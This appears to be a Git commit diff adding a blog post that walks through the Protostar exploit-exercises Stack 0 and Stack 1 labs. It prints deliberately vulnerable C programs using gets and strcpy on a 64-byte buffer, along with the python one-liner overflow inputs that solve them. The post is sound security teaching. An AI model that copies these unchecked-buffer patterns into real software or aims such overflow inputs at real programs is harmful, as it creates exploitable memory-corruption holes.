pew/paulwalko.github.io
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

new site4

Browse Source
This commit is contained in:
Paul Walko
2016-06-15 01:06:03 -04:00
parent dac869dc5d
commit cabe6e0794
12 changed files with 275 additions and 29 deletions
Download Patch File Download Diff File Expand all files Collapse all files

94
_posts/2016-06-14-nebula_exploit_exercises.md
View File

@@ -1,7 +1,99 @@
---
title: "Protostar Exploit Exercises Solutions 0-3"
title: "Protostar Exploit Exercises Solutions 0-1"
layout: post
category: writeup
tags: [exploit-exercises, protostar, hacking]
excerpt: "Walkthrough for Protostar exercises on exploit-exercises.com"
---
# Stack 0
Here's what we're given:
```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
```
The first thing I took note of is the size of the `buffer`: 64 bytes. After that, the program inputs text for `buffer`, and then checks to see if you modified the `modified` variable.
I'm guessing if I put in a string longer than 64 bytes it will work. Let's see:
```
$ echo `python -c 'print "A"*64'` | ./stack0
Try again?
```
That works as expected, now with 65 bytes:
```
$ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
```
Solved!
# Stack 1
Here's the code we're given:
```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
```
Just like Stack 0, we're given a `buffer` array size 64 bytes and we're also asked to input the contents of it. Except it looks like modified has to equal `0x61626364` instead of just changing it like before.
Keep in mind this is [little endian](https://en.wikipedia.org/wiki/Endianness), so I'll input the value in reverse order:
```
$ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
```
That works as expected, now with the additional bytes:
```
$ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
```
Woo!